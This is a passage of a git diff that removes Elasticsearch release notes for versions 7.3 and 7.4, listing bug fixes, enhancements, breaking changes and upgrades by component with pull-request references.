inner step fails {es-pull}44158[#44158] (issue: {es-issue}44156[#44156]) -* Reduce false positives associated with the multi-bucket feature. {ml-pull}491[#491] -* Reduce false positives for sum and count functions on sparse data. {ml-pull}492[#492] -* Fix an edge case causing spurious anomalies (false positives) if the variance -in the count of events changed significantly throughout the period of a seasonal -quantity. (See {ml-pull}489[#489].) - -Mapping:: -* Ensure field caps doesn't error on rank feature fields. {es-pull}44370[#44370] (issue: {es-issue}44330[#44330]) -* Prevent types deprecation warning for indices.exists requests {es-pull}43963[#43963] (issue: {es-issue}43905[#43905]) -* Fix index_prefix sub field name on nested text fields {es-pull}43862[#43862] (issue: {es-issue}43741[#43741]) -* Fix possible NPE in put mapping validators {es-pull}43000[#43000] (issue: {es-issue}37675[#37675]) -* Allow big integers and decimals to be mapped dynamically. 
{es-pull}42827[#42827] (issue: {es-issue}37846[#37846]) - -Network:: -* Reconnect remote cluster when seeds are changed {es-pull}43379[#43379] (issue: {es-issue}37799[#37799]) -* Don't require TLS for single node clusters {es-pull}42826[#42826] -* Fix Class Load Order in Netty4Plugin {es-pull}42591[#42591] (issue: {es-issue}42532[#42532]) - -Recovery:: -* Ensure to access RecoveryState#fileDetails under lock {es-pull}43839[#43839] -* Make Recovery API support `detailed` params {es-pull}29076[#29076] (issue: {es-issue}28910[#28910]) - -Reindex:: -* Properly serialize remote query in ReindexRequest {es-pull}43457[#43457] (issues: {es-issue}43406[#43406], {es-issue}43456[#43456]) -* Fixing handling of auto slices in bulk scroll requests {es-pull}43050[#43050] -* Remote reindex failure parse fix {es-pull}42928[#42928] -* Fix concurrent search and index delete {es-pull}42621[#42621] (issue: {es-issue}28053[#28053]) -* Propogate version in reindex from remote search {es-pull}42412[#42412] (issue: {es-issue}31908[#31908]) - -SQL:: -* SQL: change the size of the list of concrete indices when resolving multiple indices {es-pull}43878[#43878] (issue: {es-issue}43876[#43876]) -* SQL: handle double quotes escaping {es-pull}43829[#43829] (issue: {es-issue}43810[#43810]) -* SQL: add pretty printing to JSON format {es-pull}43756[#43756] -* SQL: handle SQL not being available in a more graceful way {es-pull}43665[#43665] (issue: {es-issue}41279[#41279]) -* SQL: fix NPE in case of subsequent scrolled requests for a CSV/TSV formatted response {es-pull}43365[#43365] (issue: {es-issue}43327[#43327]) -* Geo: Add coerce support to libs/geo WKT parser {es-pull}43273[#43273] (issue: {es-issue}43173[#43173]) -* SQL: Increase hard limit for sorting on aggregates {es-pull}43220[#43220] (issue: {es-issue}43168[#43168]) -* SQL: Fix wrong results when sorting on aggregate {es-pull}43154[#43154] (issue: {es-issue}42851[#42851]) -* SQL: cover the Integer type when extracting values from _source {es-pull}42859[#42859] (issue: {es-issue}42858[#42858]) - -Search:: -* Don't use index_phrases on graph queries {es-pull}44340[#44340] (issue: {es-issue}43976[#43976]) -* Fix wrong logic in `match_phrase` query with multi-word synonyms {es-pull}43941[#43941] (issue: {es-issue}43308[#43308]) -* Fix UOE on search requests that match a sparse role query {es-pull}43668[#43668] (issue: {es-issue}42857[#42857]) -* Fix propagation of enablePositionIncrements in QueryStringQueryBuilder {es-pull}43578[#43578] (issue: {es-issue}43574[#43574]) -* Fix score mode of the MinimumScoreCollector {es-pull}43527[#43527] (issue: {es-issue}43497[#43497]) -* Fix round up of date range without rounding {es-pull}43303[#43303] (issue: {es-issue}43277[#43277]) -* SearchRequest#allowPartialSearchResults does not handle successful retries {es-pull}43095[#43095] (issue: {es-issue}40743[#40743]) -* Wire query cache into sorting nested-filter computation {es-pull}42906[#42906] (issue: {es-issue}42813[#42813]) -* Fix auto fuzziness in query_string query {es-pull}42897[#42897] -* Fix IntervalBuilder#analyzeText to never return `null` {es-pull}42750[#42750] (issue: {es-issue}42587[#42587]) -* Fix sorting on nested field with unmapped {es-pull}42451[#42451] (issue: {es-issue}33644[#33644]) -* Deduplicate alias and concrete fields in query field expansion {es-pull}42328[#42328] - -Security:: -* Do not swallow I/O exception getting authentication {es-pull}44398[#44398] (issues: {es-issue}44172[#44172], {es-issue}44397[#44397]) -* Use system context for looking up 
connected nodes {es-pull}43991[#43991] (issue: {es-issue}43974[#43974]) -* SecurityIndexSearcherWrapper doesn't always carry over caches and similarity {es-pull}43436[#43436] -* Detect when security index is closed {es-pull}42191[#42191] - -Snapshot/Restore:: -* Check again on-going snapshots/restores of indices before closing {es-pull}43873[#43873] -* Fix Azure List by Prefix Bug {es-pull}42713[#42713] - -Store:: -* Remove usage of FileSwitchDirectory {es-pull}42937[#42937] (issue: {es-issue}37111[#37111]) -* Fix Infinite Loops in ExceptionsHelper#unwrap {es-pull}42716[#42716] (issue: {es-issue}42340[#42340]) - -Suggesters:: -* Fix suggestions for empty indices {es-pull}42927[#42927] (issue: {es-issue}42473[#42473]) -* Skip explain phase when only suggestions are requested {es-pull}41739[#41739] (issue: {es-issue}31260[#31260]) - - - -[[regression-7.3.0]] -[discrete] -=== Regressions - -Infra/Core:: -* Restore date aggregation performance in UTC case {es-pull}38221[#38221] (issue: {es-issue}37826[#37826]) - - - -[[upgrade-7.3.0]] -[discrete] -=== Upgrades - -Discovery-Plugins:: -* Upgrade AWS SDK to Latest Version {es-pull}42708[#42708] - -Engine:: -* Upgrade to Lucene 8.1.0 {es-pull}42214[#42214] - -Infra/Core:: -* Upgrade HPPC to version 0.8.1 {es-pull}43025[#43025] - -Network:: -* Upgrade to Netty 4.1.36 {es-pull}42543[#42543] (issue: {es-issue}42532[#42532]) - -Snapshot/Restore:: -* Upgrade GCS Repository Dependencies {es-pull}43142[#43142] - - diff --git a/docs/reference/release-notes/7.4.asciidoc b/docs/reference/release-notes/7.4.asciidoc deleted file mode 100644 index 18ccb1b8de6..00000000000 --- a/docs/reference/release-notes/7.4.asciidoc +++ /dev/null @@ -1,654 +0,0 @@ -[[release-notes-7.4.2]] -== {es} version 7.4.2 - -[discrete] -[[bug-7.4.2]] -=== Bug fixes - -Transform:: -* Prevent assignment if any node is older than 7.4 {es-pull}48055[#48055] (issue: {es-issue}48019[#48019]) - -[[release-notes-7.4.1]] -== {es} version 7.4.1 - -Also see <>. - -[[enhancement-7.4.1]] -[discrete] -=== Enhancements - -Engine:: -* Avoid unneeded refresh with concurrent realtime gets {es-pull}47895[#47895] -* sync before trimUnreferencedReaders to improve index preformance {es-pull}47790[#47790] (issues: {es-issue}46201[#46201], {es-issue}46203[#46203]) -* Limit number of retaining translog files for peer recovery {es-pull}47414[#47414] - -Infra/Circuit Breakers:: -* Emit log message when parent circuit breaker trips {es-pull}47000[#47000] - -Machine Learning:: -* Throttle the delete-by-query of expired results {es-pull}47177[#47177] (issues: {es-issue}47003[#47003]) -* The {ml} native processes are now arranged in a `.app` directory structure on - macOS, to allow for notarization on macOS Catalina. 
{ml-pull}593[#593] - - - -[[bug-7.4.1]] -[discrete] -=== Bug fixes - -Aggregations:: -* DocValueFormat implementation for date range fields {es-pull}47472[#47472] (issues: {es-issue}47323[#47323], {es-issue}47469[#47469]) - -Allocation:: -* Dangling indices strip aliases {es-pull}47581[#47581] - -Analysis:: -* Reset Token position on reuse in `predicate_token_filter` {es-pull}47424[#47424] (issue: {es-issue}47197[#47197]) - -Authentication:: -* Fix AD realm additional metadata {es-pull}47179[#47179] (issue: {es-issue}45848[#45848]) - -Authorization:: -* Use 'should' clause instead of 'filter' when querying native privileges {es-pull}47019[#47019] - -CCR:: -* Do not auto-follow closed indices {es-pull}47721[#47721] (issue: {es-issue}47582[#47582]) -* Relax maxSeqNoOfUpdates assertion in FollowingEngine {es-pull}47188[#47188] (issue: {es-issue}47137[#47137]) - -Cluster Coordination:: -* Omit writing index metadata for non-replicated closed indices on data-only node {es-pull}47285[#47285] (issue: {es-issue}47276[#47276]) - -Features/ILM+SLM:: -* Throw error retrieving non-existent SLM policy {es-pull}47679[#47679] (issue: {es-issue}47664[#47664]) - -Features/Indices APIs:: -* Fix Rollover error when alias has closed indices {es-pull}47148[#47148] (issue: {es-issue}47146[#47146]) - -Features/Java High Level REST Client:: -* Fix ILM HLRC Javadoc->Documentation links {es-pull}48083[#48083] - -Features/Monitoring:: -* [Monitoring] Add new cluster privilege now necessary for the stack monitoring ui {es-pull}47871[#47871] - -Infra/Scripting:: -* Drop stored scripts with the old style-id {es-pull}48078[#48078] (issue: {es-issue}47593[#47593]) - -Machine Learning:: -* Fix detection of syslog-like timestamp in find_file_structure {es-pull}47970[#47970] -* Reinstate ML daily maintenance actions {es-pull}47103[#47103] (issue: {es-issue}47003[#47003]) -* Fix possibility of crash when calculating forecasts that overflow to disk {ml-pull}688[#688] - -Network:: -* Fix es.http.cname_in_publish_address Deprecation Logging {es-pull}47451[#47451] (issue: {es-issue}47436[#47436]) - -SQL:: -* SQL: Fix issue with negative literals and parentheses {es-pull}48113[#48113] (issue: {es-issue}48009[#48009]) -* SQL: add "format" for "full" date range queries {es-pull}48073[#48073] (issue: {es-issue}48033[#48033]) -* SQL: Allow whitespaces in escape patterns {es-pull}47577[#47577] (issue: {es-issue}47401[#47401]) -* SQL: fix multi full-text functions usage with aggregate functions {es-pull}47444[#47444] (issue: {es-issue}47365[#47365]) -* SQL: wrong number of values for columns {es-pull}42122[#42122] - -Search:: -* Fix alias field resolution in match query {es-pull}47369[#47369] - -Snapshot/Restore:: -* Fix Bug in Azure Repo Exception Handling {es-pull}47968[#47968] -* Fix Snapshot Corruption in Edge Case {es-pull}47552[#47552] (issues: {es-issue}46250[#46250], {es-issue}47550[#47550]) - -Store:: -* Allow truncation of clean translog {es-pull}47866[#47866] - -Transform:: -* Fix bwc serialization with 7.3 {es-pull}48021[#48021] - - - -[[release-notes-7.4.0]] -== {es} version 7.4.0 - -Also see <>. - -[discrete] -=== Known issues - -* Applying deletes or updates on an index after it has been shrunk may corrupt -the index. In order to prevent this issue, it is recommended to stop shrinking -read-write indices. For read-only indices, it is recommended to force-merge -indices after shrinking, which significantly reduces the likelihood of this -corruption in the case that deletes/updates would be applied by mistake. 
This -bug is fixed in {es} 7.7 and later versions. More details can be found on the -https://issues.apache.org/jira/browse/LUCENE-9300[corresponding issue]. - -* Activating the <> should be avoided in this version. -Any attempt to log a slow search can throw an AIOOBE due to a bug that -performs concurrent modifications on a shared byte array. -(issue: {es-issue}/48358[#48358]) - -* Indices created in 6.x with <> and <> fields using formats -that are incompatible with java.time patterns will cause parsing errors, incorrect date calculations or wrong search results. -https://github.com/elastic/elasticsearch/pull/52555 -This is fixed in {es} 7.7 and later versions. - -[[breaking-7.4.0]] -[discrete] -=== Breaking changes - -Infra/REST API:: -* Update the schema for the REST API specification {es-pull}42346[#42346] (issue: {es-issue}35262[#35262]) - -Machine Learning:: -* Improve progress reporting for data frame analytics {es-pull}45856[#45856] - -Ranking:: -* Forbid empty doc values on vector functions {es-pull}43944[#43944] - -Search:: -* Use float instead of double for query vectors. {es-pull}46004[#46004] - -Snapshot/Restore:: -* Provide an Option to Use Path-Style-Access with S3 Repo {es-pull}41966[#41966] (issue: {es-issue}41816[#41816]) - -Transforms:: -* Combine task_state and indexer_state in _stats {es-pull}45276[#45276] (issue: {es-issue}45201[#45201]) -* Improve response format of transform stats endpoint {es-pull}44350[#44350] (issue: {es-issue}43767[#43767]) - - -[[breaking-java-7.4.0]] -[discrete] -=== Breaking Java changes - -Geo:: -* Geo: Change order of parameter in Geometries to lon, lat {es-pull}45332[#45332] (issue: {es-issue}45048[#45048]) - -Network:: -* Stop Recreating Wrapped Handlers in RestController {es-pull}44964[#44964] - - - -[[deprecation-7.4.0]] -[discrete] -=== Deprecations - -Geo:: -* Geo: add Geometry-based query builders to QueryBuilders {es-pull}45058[#45058] (issues: {es-issue}44715[#44715], {es-issue}45048[#45048]) - -Infra/Core:: -* Bundle AdoptOpenJDK 13 {es-pull}46860[#46860] -* Add deprecation check for pidfile setting {es-pull}45939[#45939] (issues: {es-issue}45938[#45938], {es-issue}45940[#45940]) -* Deprecate the pidfile setting {es-pull}45938[#45938] -* Add node.processors setting in favor of processors {es-pull}45855[#45855] -* Deprecate setting processors to more than available {es-pull}44889[#44889] - -Infra/Settings:: -* Add deprecation check for processors {es-pull}45925[#45925] (issues: {es-issue}45855[#45855], {es-issue}45905[#45905]) - -Machine Learning:: -* Only emit deprecation warning if there was actual change of a datafeed's job_id. {es-pull}44755[#44755] -* Deprecate the ability to update datafeed's job_id. 
{es-pull}44691[#44691] (issue: {es-issue}44615[#44615]) - - - -[[feature-7.4.0]] -[discrete] -=== New features - -Aggregations:: -* Support Range Fields in Histogram and Date Histogram {es-pull}45395[#45395] -* Add Cumulative Cardinality agg (and Data Science plugin) {es-pull}43661[#43661] (issue: {es-issue}43550[#43550]) - -Analysis:: -* Add support for inlined user dictionary in the Kuromoji plugin {es-pull}45489[#45489] (issue: {es-issue}25343[#25343]) - -Authentication:: -* PKI realm authentication delegation {es-pull}45906[#45906] (issue: {es-issue}34396[#34396]) -* PKI Authentication Delegation in new endpoint {es-pull}43796[#43796] (issue: {es-issue}34396[#34396]) - -Authorization:: -* Add granular privileges for API keys {es-pull}42020[#42020] - -Features/ILM:: -* Add Snapshot Lifecycle Management {es-pull}43934[#43934] (issue: {es-issue}38461[#38461]) - -Features/Watcher:: -* Add max_iterations configuration to watcher action with foreach execution {es-pull}45715[#45715] (issues: {es-issue}41997[#41997], {es-issue}45169[#45169]) - -Geo:: -* [SPATIAL] New ShapeQueryBuilder for querying indexed cartesian geometry {es-pull}45108[#45108] (issue: {es-issue}44980[#44980]) -* [GEO] New ShapeFieldMapper for indexing cartesian geometries {es-pull}44980[#44980] -* Add Circle Processor {es-pull}43851[#43851] (issue: {es-issue}43554[#43554]) -* New `shape` field type for indexing Cartesian Geometries {es-pull}43644[#43644] - -Machine Learning:: -* Allow the user to specify 'query' in Evaluate Data Frame request {es-pull}45775[#45775] (issue: {es-issue}45729[#45729]) -* Call the new _estimate_memory_usage API endpoint on data frame analytics _start {es-pull}45536[#45536] (issues: {es-issue}44699[#44699], {es-issue}45544[#45544]) -* HLRC for memory usage estimation API {es-pull}45531[#45531] (issues: {es-issue}44699[#44699], {es-issue}45188[#45188]) -* Implement ml/data_frame/analytics/_estimate_memory_usage API endpoint {es-pull}45188[#45188] (issue: {es-issue}44699[#44699]) - - - -[[enhancement-7.4.0]] -[discrete] -=== Enhancements - -Aggregations:: -* Add more flexibility to MovingFunction window alignment {es-pull}44360[#44360] (issue: {es-issue}42181[#42181]) -* Optimize Min and Max BKD optimizations {es-pull}44315[#44315] (issue: {es-issue}44290[#44290]) -* Allow pipeline aggs to select specific buckets from multi-bucket aggs {es-pull}44179[#44179] - -Allocation:: -* Defer reroute when starting shards {es-pull}44433[#44433] (issues: {es-issue}42105[#42105], {es-issue}42738[#42738]) -* Allow RerouteService to reroute at lower priority {es-pull}44338[#44338] -* Auto-release of read-only-allow-delete block when disk utilization fa… {es-pull}42559[#42559] (issue: {es-issue}39334[#39334]) - -Analysis:: -* Allow all token/char filters in normalizers {es-pull}43803[#43803] (issue: {es-issue}43758[#43758]) - -Authentication:: -* Allow Transport Actions to indicate authN realm {es-pull}45767[#45767] (issue: {es-issue}45331[#45331]) -* Explicitly fail if a realm only exists in keystore {es-pull}44471[#44471] (issue: {es-issue}44207[#44207]) - -Authorization:: -* Add `manage_own_api_key` cluster privilege {es-pull}45897[#45897] (issue: {es-issue}40031[#40031]) -* Consider `owner` flag when retrieving/invalidating keys with API key service {es-pull}45421[#45421] (issue: {es-issue}40031[#40031]) -* REST API changes for manage-own-api-key privilege {es-pull}44936[#44936] (issue: {es-issue}40031[#40031]) -* Simplify API key service API {es-pull}44935[#44935] (issue: {es-issue}40031[#40031]) - -CCR:: -* 
Include leases in error message when operations no longer available {es-pull}45681[#45681] - -CRUD:: -* Return seq_no and primary_term for noop update {es-pull}44603[#44603] (issue: {es-issue}42497[#42497]) - -Cluster Coordination:: -* Improve slow logging in MasterService {es-pull}45086[#45086] (issue: {es-issue}45007[#45007]) -* More logging for slow cluster state application {es-pull}45007[#45007] -* Ignore unknown fields if overriding node metadata {es-pull}44689[#44689] -* Allow pending tasks before state recovery {es-pull}44685[#44685] (issue: {es-issue}44652[#44652]) - -Distributed:: -* Do not create engine under IndexShard#mutex {es-pull}45263[#45263] (issue: {es-issue}43699[#43699]) - -Docs Infrastructure:: -* add clarification around TESTSETUP docu and error message {es-pull}43306[#43306] - -Engine:: -* Flush engine after big merge {es-pull}46066[#46066] -* Do sync before closeIntoReader when rolling generation to improve index performance {es-pull}45765[#45765] (issue: {es-issue}45371[#45371]) -* Refactor index engines to manage readers instead of searchers {es-pull}43860[#43860] -* Async IO Processor release before notify {es-pull}43682[#43682] -* Enable indexing optimization using sequence numbers on replicas {es-pull}43616[#43616] (issue: {es-issue}34099[#34099]) - -Features/ILM:: -* Add node setting for disabling SLM {es-pull}46794[#46794] (issue: {es-issue}38461[#38461]) -* Include in-progress snapshot for a policy with get SLM policy API {es-pull}45245[#45245] -* Add option to filter ILM explain response {es-pull}44777[#44777] (issue: {es-issue}44189[#44189]) -* Expose index age in ILM explain output {es-pull}44457[#44457] (issue: {es-issue}38988[#38988]) - -Features/Indices APIs:: -* Add Clone Index API {es-pull}44267[#44267] (issue: {es-issue}44128[#44128]) -* Add description to force-merge tasks {es-pull}41365[#41365] (issue: {es-issue}15975[#15975]) - -Features/Ingest:: -* Fix IngestService to respect original document content type {es-pull}45799[#45799] -* Ingest Attachment: Upgrade tika to v1.22 {es-pull}45575[#45575] -* Retrieve processors instead of checking existence {es-pull}45354[#45354] -* Add ingest processor existence helper method {es-pull}45156[#45156] -* Change the ingest simulate api to not include dropped documents {es-pull}44161[#44161] (issue: {es-issue}36150[#36150]) - -Features/Java High Level REST Client:: -* Add XContentType as parameter to HLRC ART#createServerTestInstance {es-pull}46036[#46036] (issue: {es-issue}45970[#45970]) -* Add CloseIndexResponse to HLRC {es-pull}44349[#44349] (issue: {es-issue}39687[#39687]) -* Add mapper-extras and the RankFeatureQuery in the hlrc {es-pull}43713[#43713] (issue: {es-issue}43634[#43634]) -* removing background state update of Request object by RequestConverte… {es-pull}40156[#40156] (issue: {es-issue}39666[#39666]) -* Add delete aliases API to the high-level REST client {es-pull}32909[#32909] (issue: {es-issue}27205[#27205]) - -Features/Watcher:: -* Add SSL/TLS settings for watcher email {es-pull}45272[#45272] (issue: {es-issue}30307[#30307]) -* Watcher reporting: add email warning if CSV attachment contains values that may be interperted as formulas {es-pull}44460[#44460] -* Watcher add stopped listener {es-pull}43939[#43939] (issue: {es-issue}42409[#42409]) -* Improve CryptoService error message on missing secure file {es-pull}43623[#43623] (issue: {es-issue}43619[#43619]) - -Geo:: -* Support WKT point conversion to geo_point type {es-pull}44107[#44107] (issue: {es-issue}41821[#41821]) - -Infra/Circuit 
Breakers:: -* Fix G1 GC default IHOP {es-pull}46169[#46169] - -Infra/Core:: -* Add OCI annotations and adjust existing annotations {es-pull}45167[#45167] (issues: {es-issue}45162[#45162], {es-issue}45166[#45166]) -* Use the full hash in build info {es-pull}45163[#45163] (issue: {es-issue}45162[#45162]) - -Infra/Packaging:: -* Remove redundant Java check from Sys V init {es-pull}45793[#45793] (issue: {es-issue}45593[#45593]) -* Notify systemd when Elasticsearch is ready {es-pull}44673[#44673] - -Infra/Plugins:: -* Make plugin verification FIPS 140 compliant {es-pull}44224[#44224] (issue: {es-issue}41263[#41263]) - -Infra/Scripting:: -* Whitelist randomUUID in Painless {es-pull}45148[#45148] (issue: {es-issue}39080[#39080]) -* Add missing ZonedDateTime methods for joda compat layer {es-pull}44829[#44829] (issue: {es-issue}44411[#44411]) -* Remove stale permissions from untrusted policy {es-pull}44783[#44783] - -Infra/Settings:: -* Add more meaningful keystore version mismatch errors {es-pull}46291[#46291] (issue: {es-issue}44624[#44624]) -* Lift the restrictions that uppercase is not allowed in Setting Name. {es-pull}45222[#45222] (issue: {es-issue}43835[#43835]) -* Normalize environment paths {es-pull}45179[#45179] (issue: {es-issue}45176[#45176]) - -Machine Learning:: -* Support boolean fields for data frame analytics {es-pull}46037[#46037] -* Add description to data frame analytics {es-pull}45774[#45774] -* Add regression analysis to data frame analytics {es-pull}45292[#45292] -* Introduce formal node ML role {es-pull}45174[#45174] (issues: {es-issue}29943[#29943], {es-issue}43175[#43175]) -* Improve CSV header row detection in find_file_structure {es-pull}45099[#45099] (issue: {es-issue}45047[#45047]) -* Outlier detection should only fetch docs that have the analyzed fields {es-pull}44944[#44944] -* Persist DatafeedTimingStats with RefreshPolicy.NONE by default {es-pull}44940[#44940] (issue: {es-issue}44792[#44792]) -* Add result_type field to TimingStats and DatafeedTimingStats documents {es-pull}44812[#44812] -* Implement exponential average search time per hour statistics. 
{es-pull}44683[#44683] (issue: {es-issue}29857[#29857]) -* Add r_squared eval metric to regression {es-pull}44248[#44248] -* Adds support for regression.mean_squared_error to eval API {es-pull}44140[#44140] -* Add DatafeedTimingStats.average_search_time_per_bucket_ms and TimingStats.total_bucket_processing_time_ms stats {es-pull}44125[#44125] (issue: {es-issue}29857[#29857]) -* Add DatafeedTimingStats to datafeed GetDatafeedStatsAction.Response {es-pull}43045[#43045] (issue: {es-issue}29857[#29857]) - -Network:: -* Better logging for TLS message on non-secure transport channel {es-pull}45835[#45835] (issue: {es-issue}32688[#32688]) -* Asynchronously connect to remote clusters {es-pull}44825[#44825] (issue: {es-issue}40150[#40150]) -* Improve errors when TLS files cannot be read {es-pull}44787[#44787] (issue: {es-issue}43079[#43079]) -* Add per-socket keepalive options {es-pull}44055[#44055] -* Move ConnectionManager to async APIs {es-pull}42636[#42636] - -Ranking:: -* Search enhancement: pinned queries {es-pull}44345[#44345] (issue: {es-issue}44074[#44074]) -* Fix parameter value for calling data.advanceExact {es-pull}44205[#44205] -* Add l1norm and l2norm distances for vectors {es-pull}44116[#44116] (issue: {es-issue}37947[#37947]) - -Recovery:: -* Ignore translog retention policy if soft-deletes enabled {es-pull}45473[#45473] (issue: {es-issue}45136[#45136]) -* Only retain reasonable history for peer recoveries {es-pull}45208[#45208] (issue: {es-issue}41536[#41536]) -* Use index for peer recovery instead of translog {es-pull}45136[#45136] (issues: {es-issue}38904[#38904], {es-issue}41536[#41536], {es-issue}42211[#42211]) -* Trim local translog in peer recovery {es-pull}44756[#44756] -* Make peer recovery send file chunks async {es-pull}44468[#44468] (issues: {es-issue}36195[#36195], {es-issue}44040[#44040]) - -SQL:: -* SQL: Support queries with HAVING over SELECT {es-pull}46709[#46709] (issue: {es-issue}37051[#37051]) -* SQL: Break TextFormatter/Cursor dependency {es-pull}45613[#45613] (issue: {es-issue}45516[#45516]) -* SQL: remove deprecated use of "interval" from date_histogram usage {es-pull}45501[#45501] (issue: {es-issue}43922[#43922]) -* SQL: use hasValue() methods from Elasticsearch's InspectionHelper classes {es-pull}44745[#44745] (issue: {es-issue}35745[#35745]) -* Switch from using docvalue_fields to extracting values from _source {es-pull}44062[#44062] (issue: {es-issue}41852[#41852]) - -Search:: -* Adds usage stats for vectors: {es-pull}44512[#44512] -* Associate sub-requests to their parent task in multi search API {es-pull}44492[#44492] -* Cancel search task on connection close {es-pull}43332[#43332] - -Security:: -* Set security index refresh interval to 1s {es-pull}45434[#45434] (issue: {es-issue}44934[#44934]) - -Snapshot/Restore:: -* add disable_chunked_encoding configuration {es-pull}44052[#44052] -* Repository Cleanup Endpoint {es-pull}43900[#43900] - -Task Management:: -* Remove task null check in TransportAction {es-pull}45014[#45014] -* TaskListener#onFailure to accept Exception instead of Throwable {es-pull}44946[#44946] -* Move child task cancellation to TaskManager {es-pull}44573[#44573] (issue: {es-issue}44494[#44494]) - -Transforms:: -* Add update transform api endpoint {es-pull}45154[#45154] (issue: {es-issue}43438[#43438]) -* Add support for bucket_selector {es-pull}44718[#44718] (issues: {es-issue}43744[#43744], {es-issue}44557[#44557]) -* Add force delete {es-pull}44590[#44590] (issue: {es-issue}43961[#43961]) -* Add dynamic cluster setting for failure 
retries {es-pull}44577[#44577] -* Add optional defer_validation param to PUT {es-pull}44455[#44455] (issue: {es-issue}43439[#43439]) -* Add support for geo_bounds aggregation {es-pull}44441[#44441] -* Add a frequency option to transform config, default 1m {es-pull}44120[#44120] - - -[[bug-7.4.0]] -[discrete] -=== Bug fixes - -Aggregations:: -* Fix early termination of aggregators that run with breadth-first mode {es-pull}44963[#44963] (issue: {es-issue}44909[#44909]) -* Support BucketScript paths of type string and array. {es-pull}44694[#44694] (issue: {es-issue}44385[#44385]) - -Allocation:: -* Avoid overshooting watermarks during relocation {es-pull}46079[#46079] (issue: {es-issue}45177[#45177]) -* Cluster health should await events plus other things {es-pull}44348[#44348] -* Do not copy initial recovery filter during split {es-pull}44053[#44053] (issue: {es-issue}43955[#43955]) - -Analysis:: -* Enable reloading of synonym_graph filters {es-pull}45135[#45135] (issue: {es-issue}45127[#45127]) -* Fix AnalyzeAction response serialization {es-pull}44284[#44284] (issue: {es-issue}44078[#44078]) - -Authentication:: -* Fallback to realm authc if ApiKey fails {es-pull}46538[#46538] -* Enforce realm name uniqueness {es-pull}46253[#46253] -* Allow empty token endpoint for implicit flow {es-pull}45038[#45038] -* Do not use scroll when finding duplicate API key {es-pull}45026[#45026] -* Fix broken short-circuit in getUnlicensedRealms {es-pull}44399[#44399] -* Fix X509AuthenticationToken principal {es-pull}43932[#43932] (issues: {es-issue}34396[#34396], {es-issue}43796[#43796]) - -Authorization:: -* Do not rewrite aliases on remove-index from aliases requests {es-pull}46989[#46989] -* Give kibana user privileges to create APM agent config index {es-pull}46765[#46765] (issue: {es-issue}45610[#45610]) -* Add `manage_own_api_key` cluster privilege {es-pull}45696[#45696] (issue: {es-issue}40031[#40031]) -* Sparse role queries can throw an NPE {es-pull}45053[#45053] - -CCR:: -* Clean up ShardFollowTasks for deleted indices {es-pull}44702[#44702] (issue: {es-issue}34404[#34404]) -* Skip update if leader and follower settings identical {es-pull}44535[#44535] (issue: {es-issue}44521[#44521]) -* Avoid stack overflow in auto-follow coordinator {es-pull}44421[#44421] (issue: {es-issue}43251[#43251]) -* Avoid NPE when checking for CCR index privileges {es-pull}44397[#44397] (issue: {es-issue}44172[#44172]) - -CRUD:: -* Ignore replication for noop updates {es-pull}46458[#46458] (issues: {es-issue}41065[#41065], {es-issue}44603[#44603], {es-issue}46366[#46366]) -* Allow _update on write alias {es-pull}45318[#45318] (issue: {es-issue}31520[#31520]) -* Do not allow version in Rest Update API {es-pull}43516[#43516] (issue: {es-issue}42497[#42497]) - -Cluster Coordination:: -* Assert no exceptions during state application {es-pull}47090[#47090] (issue: {es-issue}47038[#47038]) -* Avoid counting votes from master-ineligible nodes {es-pull}43688[#43688] - -Distributed:: -* Fix false positive out of sync warning in synced-flush {es-pull}46576[#46576] (issues: {es-issue}28464[#28464], {es-issue}30244[#30244]) -* Suppress warning logs from background sync on relocated primary {es-pull}46247[#46247] (issues: {es-issue}40800[#40800], {es-issue}42241[#42241]) -* Ensure AsyncTask#isScheduled remain false after close {es-pull}45687[#45687] (issue: {es-issue}45576[#45576]) -* Update translog checkpoint after marking operations as persisted {es-pull}45634[#45634] (issue: {es-issue}29161[#29161]) -* Fix clock used in update 
requests {es-pull}45262[#45262] (issue: {es-issue}45254[#45254]) -* Restore DefaultShardOperationFailedException's reason during deserialization {es-pull}45203[#45203] -* Use IndicesModule named writables in elasticsearch-shard tool {es-pull}45036[#45036] (issue: {es-issue}44628[#44628]) - -Engine:: -* Handle delete document level failures {es-pull}46100[#46100] (issue: {es-issue}46083[#46083]) -* Handle no-op document level failures {es-pull}46083[#46083] -* Remove leniency during replay translog in peer recovery {es-pull}44989[#44989] -* Throw TranslogCorruptedException in more cases {es-pull}44217[#44217] -* Fail engine if hit document failure on replicas {es-pull}43523[#43523] (issues: {es-issue}40435[#40435], {es-issue}43228[#43228]) - -Features/ILM:: -* Handle partial failure retrieving segments in SegmentCountStep {es-pull}46556[#46556] -* Fixes for API specification {es-pull}46522[#46522] -* Fix SnapshotLifecycleMetadata xcontent serialization {es-pull}46500[#46500] (issue: {es-issue}46499[#46499]) -* Updated slm API spec parameters and URL {es-pull}44797[#44797] -* Fix swapped variables in error message {es-pull}44300[#44300] - -Features/Indices APIs:: -* Fix a bug where mappings are dropped from rollover requests. {es-pull}45411[#45411] (issue: {es-issue}45399[#45399]) -* Create index with typeless mapping {es-pull}45120[#45120] -* Check shard limit after applying index templates {es-pull}44619[#44619] (issues: {es-issue}34021[#34021], {es-issue}44567[#44567], {es-issue}44619[#44619]) -* Validate index settings after applying templates {es-pull}44612[#44612] (issues: {es-issue}34021[#34021], {es-issue}44567[#44567]) - -Features/Ingest:: -* Allow dropping documents with auto-generated ID {es-pull}46773[#46773] (issue: {es-issue}46678[#46678]) - -Features/Java High Level REST Client:: -* [HLRC] Send min_score as query string parameter to the count API {es-pull}46829[#46829] (issue: {es-issue}46474[#46474]) -* HLRC multisearchTemplate forgot params {es-pull}46492[#46492] (issue: {es-issue}46488[#46488]) -* terminateAfter added to the RequestConverter {es-pull}46474[#46474] (issue: {es-issue}46446[#46446]) -* [Closes #44045] Added 'slices' parameter when submitting reindex request via Java high level REST client {es-pull}45690[#45690] (issue: {es-issue}44045[#44045]) -* HLRC: Fix '+' Not Correctly Encoded in GET Req. {es-pull}33164[#33164] (issue: {es-issue}33077[#33077]) - -Features/Watcher:: -* Fix class used to initialize logger in Watcher {es-pull}46467[#46467] -* Fix wrong URL encoding in watcher HTTP client {es-pull}45894[#45894] (issue: {es-issue}44970[#44970]) -* Fix watcher HttpClient URL creation {es-pull}45207[#45207] (issue: {es-issue}44970[#44970]) -* Log write failures for watcher history document. 
